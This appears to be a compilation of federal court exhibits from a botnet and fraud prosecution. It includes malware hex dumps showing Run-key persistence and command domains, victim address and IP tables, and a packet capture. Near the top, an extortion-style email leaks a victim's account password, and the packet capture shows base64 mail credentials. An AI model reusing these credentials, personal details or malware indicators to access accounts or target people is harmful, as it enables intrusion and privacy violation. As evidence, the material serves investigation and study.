\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

Re: FW: 1959 Chevy Bel Air vs 2009 Chevy Malibu
Thursday, October 8, 2009 7:35 PM
From: "michael smith" <elmikey7@yahoo.com>
To: L███████████@aol.com

----Original Message----

Date: Thursday, October 08, 2009 7:27:26 pm
To: elmikey7@yahoo.com
From: L█████████████
Subject: Re: FW: 1959 Chevy Bel Air vs 2009 Chevy Malibu

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

RE: fuuny
Thursday, October 8, 2009 7:45 PM
From: "michael smith" <elmikey7@yahoo.com>
To: L██████████@aol.com

----Original Message----
Date: Thursday, October 08, 2009 7:30:41 pm
To: elmikey7@yahoo.com
From: ████████████@████████
Subject: fuuny

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

RE: (no subject)
Thursday, October 8, 2009 7:49 PM
From:"michael smith" <elmikey7@yahoo.com>
To: L████████████@████████

----Original Message----
Date: Thursday, October 08, 2009 7:38:16 pm
To: elmikey7@yahoo.com
From: L████████████████
Subject: (no subject)



\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

Re: hey
Sunday, August 29, 2010 9:35 PM
From:"michael smith" <elmikey7@yahoo.com>
To:La███████████████████

--- On Sun, 8/29/10, Lanarossann@aol.com <Lanarossann@aol.com> wrote:

From: L█████████████████<Lanarossann@aol.com>
Subject: hey
To: Elmikey7@yahoo.com
Date: Sunday, August 29, 2010, 9:14 PM

--=====_129334325418467=_
Content-Type: text/html; charset="us-ascii"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.6000.17080" name=GENERATOR></HEAD>
<BODY style="FONT-FAMILY: Arial" text=#000000 bgColor=#ffffff>
<DIV><FONT face=Verdana size=2>Hello M█Ra</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>Sorry for getting into your lives, I will get
straight to the point as it's kind of late now.</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>I wanted to sell my car and ██Ke replied to an ad
of mine, than he started using harsh language, offended me and although I am a
man of understanding, I ended up not tollerating his shit. Being bright with
computers, I thought of teaching him a lesson and wiping his files, email
accounts and other accounts he may have with other websites.</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>This is what I wanted to do at first, but hey I'm
not irrational. I thought it up for a momment I could have done a lot of harm to
other innocent people and I started investigating more about him and what kind
of man he is. I went from the idea that he's a fucking moron and the way he is
treating you as a wife confirmed this to me.</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>I don't wanna do any harm to you, just to the
moron Mike who treated me with very big disrespect, and I want you to find out
something about his love affairs and about what he does when he's out there in
the freedom 4 hours by himself or when you think he's at work. Check out those
emails between him and █████████</FONT><A
href="mailto:Lanarossann@aol.com"><FONT face=Verdana
size=2>Lanarossann@aol.com</FONT></A><FONT face=Verdana size=2> ) at the end of
this. It starts out easily then it gets more passionate.</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>If you dont believe me then log on to his yahoo
account</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>username: </FONT><A
href="mailto:elmikey7@yahoo.com"><FONT face=Verdana
size=2>elmikey7@yahoo.com</FONT></A><BR><FONT face=Verdana size=2>password:

2559750</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>and search through the messages in the Sent folder, you will find those there. Check the messages from the inbox as well, there were some there but not as passionate as those from the Sent folder. He took care to delete the ones incriminating him maybe</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>Oh and you can even ask Lara.</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><BR><FONT face=Verdana size=2>You may be wondering why am I doing this, I could have erased all the data in your ebay account as well "myseventeen", but seeing what a jerk this husband of yours is, and this having nothing to do with you, moreover his a jerk to you too, I changed my mind. </FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><BR><FONT face=Verdana size=2>Yours,<BR>Mr X</FONT></DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2></FONT> </DIV>
<DIV><FONT face=Verdana size=2>Here are emails between Mike and Lana  starting 2007 up to 2010</FONT></DIV>
<DIV> </DIV>
<DIV><BR>Re: thank u<BR><FONT color=#ff0000>Saturday, March 24, 2007 9:53 AM<BR></FONT>From: "michael smith" &lt;<A href="mailto:elmikey7@yahoo.com">elmikey7@yahoo.com</A>&gt;<BR>To: <A href="mailto:Lanarossann@aol.com">Lanarossann@aol.com</A></DIV>
<DIV> </DIV>
<DIV>Hi. I just got back and checked my emails. How are things at the gym? Have

O'Murchu                                    4- PIZDKEY

GOVERNMENT
EXHIBIT
1:16CR224

1424

O'Murchu                                    4- pulanestula

O'Murchu                                        4- pulaosuglingat

Hiew: 0472eae8e33dc0874052a671050bd2c8

94% 0472eae8e33dc0874052a671050bd2c8                    FRO ----------          PE .004392E5 Hiew 8.41 (c)SEN

ion of Windows y
ou're running. C
heck your comput
er's system info
rmation to see w
hether you need
a x86 (32-bit) o
r x64 (64-bit) v
ersion of the pr
ogram, and then
contact the soft
ware publisher.
Content-Length:
%d GET
HTTP/1.0 Accep
t: */* Connecti
on: close Host:
Keep
-Alive wb pref
ixexeXZSEQUS
XZSEQUSpostf
ix.exe %PDM
TESOX "%s" %s %s
rb Software
\Microsoft\Windo
ws\CurrentVersio
n\Run WATCHDOG
PROC " user
profile %s\Local
Settings\Applic
ation Data\NICOL
AEGUTAXZSEQUS
WATC
HDOGPROC "%s"
COSTIIONITAEQUS

rng_cxtXZSEQUS
XZSEQUSpulaosugi
ingatexe
XZSEQUSwatch_dog
_name.exe
/forum/search.ph
p?email=XZSEQUS

&method=post
.net

journey destroy
against night vi
thin effort stre
et better buchan
d little doubt d

O'Murchu                                    4- Putzerie69

Hiew: 9395_1c9a4795.T-11EC--9395_1c9a4795.tmp-400000.bin

Partial readable ASCII strings from dump:

DATAKEY
<«L,í @  d7zk8tr@
yahoo.com

fly_
cobalt240

"morecamdcal
s.com"  "toammai
arna.com"  "putz
erie69.com"¶
...
AL Alaba
ma AK Alaska AZ
Arizona AR Arkan
sas CA Californi
a CO Colorado CT
Connecticut DE
Delaware DC Dist
rict of Columbia
FL Florida GA G
eorgia ID Idaho
IL Illinois IN I
ndiana IA Iowa K
I Hawaii KS Kans
as KY Kentucky L
A Louisiana ME M
aine MD Maryland
MA Massachusett
s MI Michigan MN
Minnesota MS Mi
ssissippi MO Mis
souri MT Montana
NE Nebraska NV
Nevada NH New Ha
mpshire NJ New J
ersey NM New Mex
ico NY New York
NC North Carolin
a ND North Dakot
a OH Ohio OK Okl
ahoma OR Oregon
PA Pennsylvania
RI Rhode Island
SC South Carolin
a SD South Dakot
a TN Tennessee T

O'Murchu                                    4- SUGE_Fools

```
Hiew: 9395_9a0dc91b.e-7C4—9395_9a0dc91b.exv-400000.bin
83% 9395_9a0dc91b.e-7C4—9395_9a0dc91b.exv-400000.bin      PRO ••    PE .0042CC10 Hiew 8.41 (c)SEN
.0042C990: 2F 63 66 6D-2F 63 68 65-63 6B 5F 6F-72 64 65 72   /cfm/check_order
.0042C9A0: 2E 63 66 6D-3F 76 69 6E-3D 00 00 00-00 26 70 61   .cfm?vin=    &pa
.0042C9B0: 74 6E 3D 55-4E 4B 5F 44-53 4F 5F 33   tn=UNK_1_DEC_3
...
SUGE WEBSET*!!!!
```

UNCLASSIFIED

### UNITED STATES DEPARTMENT OF JUSTICE
### FEDERAL BUREAU OF INVESTIGATION



FBI ATLANTA
3000 Flowers Road South
Atlanta, Georgia, 30341

| | |
|---|---|
| File Number: | 288A-CV-73802 |
| Requesting Official(s) and Office(s): | SA Stacy Lough (CV) |
| Task Number(s) and Date Completed: | 914120, Request ID: 905498, 11/14/2018<br>914121, Request ID: 905498, 12/14/2018 |
| Name and Office of Linguist(s): | CL Camelia Geerdes (AT) |
| Name and Office of Reviewer(s): | CL Mark Sirb (AT); CL Ildiko Izabella Toma (KC) |
| Source Language(s): | Romanian |
| Target Language: | English |
| Source File Information | |
| | 1-Spam.pdf; 4-_Romanian_Words.pdf; 9-_cc.pdf;<br>29-_Raduspr_Brasov.pdf |

## DOCUMENT VERBATIM TRANSLATION

Abbreviations:

| | |
|---|---|
| [IL] | Illegible |
| [*sic*] | Information provided as it appears in the source |

Languages:

| | |
|---|---|
| Primary language | Romanian |
| *Secondary language* | *English* |

UNCLASSIFIED

UNCLASSIFIED

Case # 288A-CV-73802
File: 4-_Romanian_Words



ADRIANCOPILULMINUNEF
LORINSALAM PIZDKEY [sic]

UNCLASSIFIED

1

UNCLASSIFIED

Case # 288A-CV-73802

File: 4-_Romanian_Words



UNCLASSIFIED

2

Gov. Ex. 1424 Pg 8 of 11

UNCLASSIFIED

Case # 288A-CV-73802
File: 4-_Romanian_Words

UNCLASSIFIED
3

Gov. Ex. 1424 Pg 9 of 11

UNCLASSIFIED

Case # 288A-CV-73802
File: 4-_Romanian_Words



UNCLASSIFIED
4

UNCLASSIFIED

Case # 288A-CV-73802
File: 4-_Romanian_Words

Gov. Ex. 1424 Pg 11 of 11



cc   O'Murchu

Search as you type: [          ] [Clear]

| id | good | line | notes | action | |
|---|---|---|---|---|---|
| | ☐ | | | [Insert] | |
| 100 | ☑ | 2157 ▓▓▓▓ [none] lebanon PA 17042 ▓▓▓-▓▓▓-6900 | yahoo x2 | [Update] | [Delete] |
| 82 | ☑ | ▓▓▓▓-▓▓ ▓▓▓▓ [none] muskogee OK ▓▓▓▓ ▓▓▓▓▓ | natiune / drona ipage (6-02-13) drona presen | [Update] | [Delete] |
| 81 | ☑ | 475 ocean ave apt 1h brooklyn NY 11226 ▓▓▓▓▓ | natiune / drona att (6-02-13), yah drona | [Update] | [Delete] |
| 76 | ☑ | ▓▓▓▓ Autumn Maple Lane [none] Gaithersburg MD ▓▓▓▓ | linx yahoo plus | [Update] | [Delete] |
| 66 | ☑ | 820 Cherry Valley Rd [none] Bull Valley IL 60050 [none] | Skype | [Update] | [Delete] |
| 65 | ☑ | 306 sheppard rd [none] unadilla NY 13849 ▓▓▓▓▓▓ | yahoo hostx2, failed skype | [Update] | [Delete] |
| 43 | ☑ | ▓▓ra 444 Road St. [none] Nashua NH 03064 [none] [none] | dreamhost vps | [Update] | [Delete] |
| 42 | ☑ | Industrial Dr. [none] Clare MI 48617 ▓▓▓-▓▓▓-▓▓▓▓ [none] | dreamhost vps | [Update] | [Delete] |
| 36 | ☑ | 349 ▓▓▓▓▓▓▓▓▓▓ [none] Lake in the Hills IL ▓▓▓▓▓ [none] | | [Update] | [Delete] |
| 34 | ☑ | ▓SON 115 E COLLEGE ST [none] KEWANEE IL 61443 | 29-10-2012 natiune ymail | [Update] | [Delete] |
| 30 | ☑ | no 35 Sweetwater Court NY East Amherst NY 14051 716-78▓ | minolta multe cumparaturi dar mai mergea | [Update] | [Delete] |
| 25 | ☑ | 331 ▓▓▓▓▓▓ kk_yahoo_ky inglewood CA 90302 310-21▓ | minolta multe cumparaturi dar mai merge | [Update] | [Delete] |
| 24 | ☑ | 3266 Sunset Ridge Terrace kk_yahoo Chico CA 95928 530-64▓ | minolta multe cumparaturi dar mai merge | [Update] | [Delete] |
| 23 | ☑ | ▓nore Dr ▓▓▓▓ Thornwood Rd k_yahoo Shippensburg PA | minolta multe cumparaturi dar mai merge | [Update] | [Delete] |
| 22 | ☑ | 68 MCMULLEN AVENUE k_yahoo WETHERSFIELD CT 06109 | minolta multe cumparaturi dar mai merge | [Update] | [Delete] |
| 13 | ☑ | 1366 martinez st ▓▓ [none] Palm Bay FL 32909 [none] | natiune host 12-10-2012 / linx yahoo plus | [Update] | [Delete] |
| 9 | ☑ | ▓▓ ▓▓▓▓▓▓▓ [none] stonybrook NY 11790 [none] | natiune (enom.com) 12-10-2012 / linx yahoo | [Update] | [Delete] |
| 3 | ☑ | 470 W. Schroeder Way BUNA Rushville IN 46173 317-39▓ | minolta | [Update] | [Delete] |
| 2 | ☑ | 461 ▓▓ 62 st west NY muskogee OK 74401 ▓▓▓-▓▓▓-▓▓▓▓ | minolta de testat | [Update] | [Delete] |
| 1 | ☑ | ▓▓▓▓ Maryland St Apt 110 Studio City CA 91604 818-51▓ | minolta | [Update] | [Delete] |
| 110 | ☐ | st 201 ▓▓▓▓ [none] pierson station IL 61929 [none] | craigs phone | [Update] | [Delete] |
| 109 | ☐ | A EY ▓▓▓▓▓ SOUTH STREET [none] LOS ANGELES CA 90018 | craigs phone | [Update] | [Delete] |
| 108 | ☐ | J▓ 20869 Gill Rd. [none] Farmington Hills MI 48335 248-76▓ | craigs phone | [Update] | [Delete] |
| 107 | ☐ | W ▓m 2001 ▓▓▓▓▓▓ Dr Apt [none] Mesquite TX 75150 [none] | craigs phone | [Update] | [Delete] |
| 106 | ☐ | 4000 ▓▓▓▓▓ Rd [none] Westfield PA 16950 814-62▓ | craigs phone | [Update] | [Delete] |

Gov_Ex 1429 Pg 1 of 3

GOVERNMENT EXHIBIT 1:16CR224 1429

UNCLASSIFIED

**UNITED STATES DEPARTMENT OF JUSTICE**
**FEDERAL BUREAU OF INVESTIGATION**



FBI ATLANTA
3000 Flowers Road South
Atlanta, Georgia, 30341

| | |
|---|---|
| File Number: | 288A-CV-73802 |
| Requesting Official(s) and Office(s): | SA Stacy Lough (CV) |
| Task Number(s) and Date Completed: | 914120, Request ID: 905498, 11/14/2018<br>914121, Request ID: 905498, 12/14/2018 |
| Name and Office of Linguist(s): | CL Camelia Geerdes (AT) |
| Name and Office of Reviewer(s): | CL Mark Sirb (AT); CL Ildiko Izabella Toma (KC) |
| Source Language(s): | Romanian |
| Target Language: | English |
| Source File Information | |
| | 1-Spam.pdf; 4-_Romanian_Words.pdf; 9-_cc.pdf;<br>29-_Raduspr_Brasov.pdf |

DOCUMENT VERBATIM TRANSLATION

Abbreviations:
    [IL]                Illegible
    [*sic*]             Information provided as it appears in the source

Languages:
    Primary language         Romanian
    *Secondary language*     *English*

UNCLASSIFIED

UNCLASSIFIED

Case #: 288A-CV-73802
File: 9- cc.pdf



UNCLASSIFIED
1

O'Murchu 21- Paragraph 168

| Date | Domain | Identity Used |
|------|--------|---------------|
| 04/17/14 | recordcontinue.net | F.G. |
| 04/20/14 | spendmarry.net | F.G. |
| 04/20/14 | frontride.net | D.S. |
| 04/26/14 | wrongthrew.net | D.S. |
| 04/27/14 | chieftraining.net | F.G. |
| 04/28/14 | hangcold.net | F.G. |
| 04/28/14 | middleevery.net | D.S. |
| 04/29/14 | suffermeeting.net | J.S. |
| 05/01/14 | husbandbeauty.net | J.S. |
| 05/12/14 | electricelectricity.net | R.M. |
| 05/12/14 | againstspread.net | R.M. |
| 05/13/14 | captaingarden.net | R.M. |
| 05/14/14 | gathermayor.net | R.M. |
| 05/14/14 | presentchance.net | R.M. |
| 05/15/14 | morningelectricity.net | R.M. |
| 05/16/14 | weathersquare.net | K.C. |
| 05/17/14 | historyperfect.net | K.C. |
| 05/19/14 | seasonproduce.net | J.R. |
| 05/19/14 | decidebrought.net | J.R. |
| 05/20/14 | chiefbroad.net | J.R. |
| 05/21/14 | rockknew.net | T.J. |
| 05/21/14 | rathernearly.net | T.J. |
| 05/21/14 | collegesuppose.net | J.R. |
| 05/21/14 | hangclock.net | O.K. |
| 05/22/14 | calloctover.net | R.G. |
| 05/22/14 | spendstudy.net | R.G. |
| 05/22/14 | westweight.net | R.B. |
| 05/22/14 | likrlend.net | S.H. |
| 05/22/14 | septemberwall.net | A.Q. |
| 05/22/14 | favoroctober.net | D.L. |
| 05/22/14 | classwrite.net | T.J. |
| 05/22/14 | pointdeal.net | J.D. |
| 05/22/14 | historymethod.net | R.G. |
| 05/22/14 | ringfirst.net | C.M. |
| 05/23/14 | torebuild.net | C.M. |
| 05/23/14 | viewcome.net | A.Q. |
| 05/23/14 | takestood.net | S.H. |
| 05/23/14 | lrstnfeed.net | R.B. |
| 05/23/14 | strengthkitchen.net | D.L. |
| 05/23/14 | ringoctober.net | J.D. |
| 05/23/14 | muchouter.net | D.L. |
| 05/23/14 | fallworld.net | T.J. |

GOVERNMENT
EXHIBIT
1:16CR224

1441

O'Murchu 21- Paragraph 168

| Date | Domain | Identity Used |
|------|--------|---------------|
| 05/23/14 | doublewhose.net | J.D. |
| 05/25/14 | pointfine.net | R.B. |
| 05/25/14 | strengthfinger.net | A.Q. |
| 05/25/14 | foreignladder.net | R.B. |
| 05/25/14 | wellshirt.net | C.M. |
| 05/25/14 | storeenough.net | S.H. |
| 05/25/14 | resultfurther.net | T.J. |
| 05/25/14 | likrhers.net | J.D. |
| 05/25/14 | noseheld.net | A.Q. |
| 05/27/14 | machineproud.net | S.H. |
| 05/27/14 | familybecome.net | R.B. |
| 05/27/14 | thoughnature.net | C.M. |
| 05/27/14 | fiftyserve.net | A.Q. |
| 05/27/14 | soilserve.net | C.M. |
| 05/27/14 | childrenwhose.net | J.D. |
| 05/27/14 | soilonly.net | R.S. |
| 05/27/14 | fiftyopen.net | R.B. |
| 05/27/14 | soilopen.net | D.S. |
| 05/27/14 | soilhear.net | S.H. |
| 05/27/14 | fiftyonly.net | J.D. |
| 05/28/14 | southsing.net | C.M. |
| 05/28/14 | fiftysing.net | D.S. |
| 05/28/14 | triedpage.net | S.H. |
| 05/28/14 | triedserve.net | R.S. |
| 05/29/14 | fellowmodern.net | C.M. |
| 05/29/14 | mightadvance.net | S.H. |
| 05/29/14 | thoughfinger.net | A.Q. |
| 05/29/14 | strengthforever.net | J.D. |
| 05/30/14 | stillsister.net | S.H. |
| 05/30/14 | storestation.net | C.M. |
| 07/24/14 | watercaught.net | J.M. |
| 07/25/14 | knownguard.net | J.M. |
| 07/25/14 | experiencedevice.net | J.M. |
| 07/25/14 | enemydont.net | J.M. |

O'Murchu                                    26- MinoltaScreenshot



Gov. Ex. 1446 Pg 1 of 2

GOVERNMENT
EXHIBIT
1:16CR224
1446

Match-U — http://67.205.14.206/s/s3/ping-view.php?lports — sox3 — 26-67-205-14-206-ping-view

`http://67.205.14.206/s/s3/ping-view.php?lports` | sox3

000    stats: 166 online · 166 lports (100%c) · 0 opened · 92 used · 0.18 total speed (Gbps)    clean (one month)    relay ip: 67.205.14.206

| eb | ip | hport | relay | action | ls | host | city | state | time | uptime | speed (KBps) | ver |
|----|----|-------|-------|--------|----|------|------|-------|------|--------|--------------|-----|
| ☑ | 98.198.201.148:20748 | ? | 98.198.201.148:20748.19baf60c | h p a | 52d | c-98-198-201-148.hsd1.tx.comcast.net | Houston | TX | 46m | 188d | 218.54 | 000 |
| ☑ | 99.62.85.6:21134 | ? | 99.62.85.6:21134.19bac40f | h p a | 23d | adsl-99-62-85-6.dsl.lsan03.sbcglobal.net | Los Angeles | CA | 20m | 179d | 171.28 | 000 |
| ☐ | 216.119.157.62:29453 | ? | 216.119.157.62:29453.213d1400 | h p a | 10d | 216.119.157.62.static.midphase.com | Houston | TX | 1h | 172d | 317.31 | 000 |
| ☑ | 23.24.26.181:50043 | ? | 23.24.26.181:50043.19baf403 | h p a | 3h | 23-24-26-181-static.hfc.comcastbusiness.net | Philadelphia | PA | 1h | 146d | 140.83 | 000 |
| ☑ | 74.34.197.47:30815 | ? | 74.34.197.47:30815.1b488200 | h p a | 76d | 74-34-197-47.dsl1-pixley.roch.ny.frontiernet.net | Rochester | NY | 59m | 103d | 186.44 | 000 |
| ☑ | 99.111.187.113:30220 | ? | 99.111.187.113:30220.19baca02 | h p a | 3d | adsl-99-111-187-113.dsl.emhril.sbcglobal.net | Aurora | IL | 1h | 96d | 129.24 | 000 |
| ☑ | 98.245.178.193:40807 | ? | 98.245.178.193:40807.19baa620 | h p a | 73d | c-98-245-178-193.hsd1.co.comcast.net | Denver | CO | 1h | 87d | 211.09 | 000 |
| ☑ | 75.127.218.250:47367 | ? | 75.127.218.250:47367.1b10ac00 | h p a | 73d | ool-4b7fdafa.static.optonline.net | Roanoke | VA | 20m | 55d | 117.44 | 000 |
| ☐ | 68.46.168.113:51418 | ? | 68.46.168.113:51418.19d68802 | h p a | 2d | c-68-46-168-113.hsd1.nj.comcast.net | Barnegat | NJ | 31m | 51d | 162.56 | 000 |
| ☐ | 173.48.152.54:44879 | ? | 173.48.152.54:44879.1fbc02 | h p a | 65d | pool-173-48-152-54.bstnma.fios.verizon.net | Boston | MA | 28m | 50d | 186.44 | 000 |
| ☑ | 206.248.252.176:21918 | ? | 206.248.252.176:21918.1fe6a400 | h p a | 17d | 206-248-252-176.wbo.dmt.ntelos.net | Charlottesville | VA | 44m | 46d | 6.39 | 000 |
| ☐ | 174.44.124.31:28800 | ? | 174.44.124.31:28800.139cfc00 | h p a | 5d | ool-ae2c7c1f.dyn.optonline.net | Montville | NJ | 24m | 35d | 135.43 | 000 |
| ☐ | 76.94.244.226:39582 | ? | 76.94.244.226:39582.19baaa04 | h p a | 73d | cpe-76-94-244-226.socal.res.rr.com | Torrance | CA | 28m | 32d | 117.3 | 000 |
| ☐ | 184.4.43.184:20874 | ? | 184.4.43.184:20874.1ff3b601 | h p a | 17d | nc-184-4-43-184.dhcp.embarqhsd.net | Greenville | NC | 1h | 32d | 95.93 | 000 |
| ☑ | 68.170.71.235:34995 | ? | 68.170.71.235:34995.19bac807 | h p a | 9d | 235.71.170.68.belairinternet.com | Sykesville | MD | 15m | 31d | 103.88 | 000 |
| ☐ | 68.113.20.37:52145 | ? | 68.113.20.37:52145.19bad00d | h p a | 10d | 68-113-20-37.dhcp.knwc.wa.charter.com | Medford | OR | 1h | 31d | 198 | 000 |
| ☐ | 68.93.65.5:29792 | ? | 68.93.65.5:29792.1a6e4800 | h p a |  | adsl-68-93-65-5.dsl.hstntx.swbell.net | Houston | TX | 1h | 30d | 143.9 | 000 |
| ☐ | 74.100.61.191:41400 | ? | 74.100.61.191:41400.19bac63f | h p a | 3d | pool-74-100-61-191.lsanca.fios.verizon.net | Los Angeles | CA | 21m | 26d | 316.29 | 000 |
| ☐ | 68.34.13.137:38154 | ? | 68.34.13.137:38154.19baac01 | h p a | 37d | c-68-34-13-137.hsd1.md.comcast.net | Silver Spring | MD | 16m | 26d | 132 | 000 |
| ☐ | 68.206.255.117:22502 | ? | 68.206.255.117:22502.19bad21e | h p a |  | cpe-68-206-255-117.satx.res.rr.com | San Antonio | TX | 20m | 26d | 119.13 | 000 |
| ☐ | 98.24.79.11:21619 | ? | 98.24.79.11:21619.12274a02 | h p a | 73d | cpe-098-024-079-011.carolina.res.rr.com | Charlotte | NC | 1h | 26d | 137.69 | 000 |
| ☐ | 24.154.22.173:44489 | ? | 24.154.22.173:44489.c46dc0a | h p a | 17d | dynamic-acs-24-154-22-173.zoominternet.net | Butler | PA | 5m | 26d | 132 | 000 |
| ☐ | 199.187.205.76:37292 | ? | 199.187.205.76:37292.201c24 | h p a | 3d | host-199-187-205-76.twiakes.net | Jamestown | TN | 41m | 26d | 180.99 | my320b |
| ☑ | 74.132.126.185:28678 | ? | 74.132.126.185:28678.201201 | h p a | 73d | 74-132-126-185.dhcp.insightbb.com | Louisville | KY | 20m | 25d | 103.88 | 000 |
| ☐ | 74.109.228.190:32519 | ? | 74.109.228.190:32519.12352000 | h p a | 17d | pool-74-109-228-190.pitbpa.fios.verizon.net | Pittsburgh | PA | 1h | 23d | 107.38 | 000 |
| ☐ | 74.90.142.75:44538 | ? | 74.90.142.75:44538.1b578000 | h p a | 17d | ool-4a5a8e4b.dyn.optonline.net | Norwalk | CT | 20m | 21d | 140.83 | 000 |



Twitter, Inc. [US] | https://twitter.com/raduspr

**Home**  **Moments**

Search Twitter

Have an account? **Log in**

Tweets **2**   Following **3**   Followers **5**

Follow

**Radu Bogdan**
@raduspr

Joined January 2011

**New to Twitter?**

Sign up now to get your own personalized timeline!

**Sign up**

**You may also like** · Refresh

**Los Angeles Times** ✓
@latimes

**LAist** ✓
@LAist

**L.A. Weekly** ✓

Gov. Ex. 1448 Pg 1 of 1

**Tweets & replies**

**Radu Bogdan** @raduspr · 7 Dec 2013
Replying to @ypool_net
@ypool_net any updates?

♡ 1

**Radu Bogdan** @raduspr · 1 Dec 2013
@ypool_net server down? or what happened?

**Loading seems to be taking a while.**
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

GOVERNMENT
EXHIBIT
1:16CR224
1448

O'Murchu 30



A hex editor (Hiew) screenshot showing a binary dump. The readable ASCII strings in the right-hand column include:

```
DATAKEY:·#·"¤
t¶i¦ á☺ kutrong@
yahoo.com

m19j
9 aded

"bestbuildmo
ney.com"J☺"kidsg
raveyard.com"J☺
noricaonline.com
"J☺"liamthemale.
com"J☺"gayliamas
shole.com"J☺
JanFebMarAprMayJ
unJulAug$☐☐OctNo
vDec        AL Alaba
ma AK Alaska AZ
Arizona AR Arkan
sas CA Californi
a CO Colorado CT
Connecticut DE
Delaware DC Dist
rict of Columbia
FL Florida GA G
eorgia ID Idaho
IL Illinois IN I
ndiana IA Iowa H
I Hawaii KS Kans
as KY Kentucky L
A Louisiana ME M
aine MD Maryland
MA Massachusett
s MI Michigan MN
Minnesota MS Mi
ssissippi MO Mis
souri MT Montana
NE Nebraska NV
Nevada NH New Ha
mpshire NJ New J
ersey NM New Mex
ico NY New York
NC North Carolin
a ND North Dakot
a OH Ohio OK Okl
ahoma OR Oregon
PA Pennsylvania
RI Rhode Island
SC South Carolin
a SD South Dakot
```

Status bar: `.0041F209 Hiew 8.41 (c)SEN`

O'Murchu 30



O'Murchu 30

O'Murchu 30

O'Murchu 30



O'Murchu 30



O'Murchu



## Connection 1 (TCP)

**Start: 2013-08-23 16:10:06.036222 UTC**
**  End: 2013-08-23 16:10:18.970628 UTC**
**172.162.80.28:1542 -> 74.208.5.1:587 (79104 bytes)**
**74.208.5.1:587 -> 172.162.80.28:1542 (446 bytes)**

```
220 gmx.com (mrgmxus002) Nemesis ESMTP Service ready
EHLO computer
250-gmx.com Hello computer [172.162.80.28]
250-SIZE 69920427
250-AUTH LOGIN PLAIN
250 STARTTLS
AUTH LOGIN
334 VXNlcm5hbWU6
cmExMDFwdXRpbkBnbXguY29t
334 UGFzc3dvcmQ6
aG9hc2thTUF0aWky
235 Authentication succeeded
RSET
250 OK
MAIL FROM:<ra101putin@gmx.com>
250 Requested mail action okay, completed
RCPT TO:<amightysa@gmail.com>
250 OK
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Message-ID: <20130823191051 0750.00339802@mail.gmx.com>
X-Mailer: Courier 3.50.00.09.1098 (http://www.rosecitysoftware.com) (P)
Date: Fri, 23 Aug 2013 19:10:51 +0300
From: "ra101putin@gmx.com" <ra101putin@gmx.com>
To: amightysa@gmail.com
Subject: amounts final
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=====_137727425118467=_"

--=====_137727425118467=_
Content-Type: text/plain; charset="us-ascii"


--=====_137727425118467=_
Content-Type: application/vnd.ms-excel; name="amounts.xls"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="amounts.xls"
```

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAAAB
AAAAbQAAAAAAAAAEAAA/v///wAAAAD+////AAAAGwAAAD//////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////

GOVERNMENT
EXHIBIT
1:16CR224

1741

```
////////////////////////8JCBAAAAYFAJsgzQfJwAAABgMAAOEAAgCwBMEA
AgAAAOIAAABcAHAACQAARnVsbCBOYW1lICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEIAAgCwBGEBAgAA
AMABAAA9AQoAAQADAAAQABQAGAJwAAgAOABkAAgAAABIAAgAAABMAAgAAAK8B
AgAAALwBAgAAAD0AEgDwAHgALB+IDjgAAAAAAAEAWAJAAAIAAACNAAIAAAAi
AAIAAAAOAAIAAQC3AQIAAADaAAIAAAAxABoAyAAAAP9/kAEAAAAAAAsFAUEA
cgBpAGEAbAAxABoAyAABAP9/vAIAAAAAAAsFAUEAcgBpAGEAbAAxABoAyAAAAAC
AP9/kAEAAAAAAAsFAUEAcgBpAGEAbAAxABoAyAADAP9/vAIAAAAAAAsFAUEA
